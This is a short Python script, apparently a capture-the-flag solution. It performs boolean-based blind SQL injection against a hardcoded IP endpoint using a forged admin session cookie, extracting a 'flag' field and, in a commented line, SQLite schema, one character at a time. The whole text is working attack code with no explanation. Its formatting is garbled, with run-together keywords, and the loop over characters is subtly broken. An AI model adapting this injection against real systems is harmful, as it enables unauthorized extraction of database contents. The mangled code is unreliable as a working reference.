url = "http://1.14.71.254:28697/query" s = requests.session() headers = {'Cookie': 'session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.YklOVg.Pz554uNEiaxxBCpP4pm7-G8iucg'}
if __name__ == "__main__": name = '' for i inrange(0,100): char = '' for j instr: #表+字段 #payload = "1 and substr((select sql from sqlite_master limit 1,1),{},1)='{}'".format(i, j) #数据 payload = "1 and substr((select flag from flag limit 0,1),{},1)='{}'".format(i, j) data = {"id": payload} r = s.post(url=url, data=data, headers=headers) #print(r.text) if"exist"in r.text: name += j print (j, end='') char = j break if char == '%': break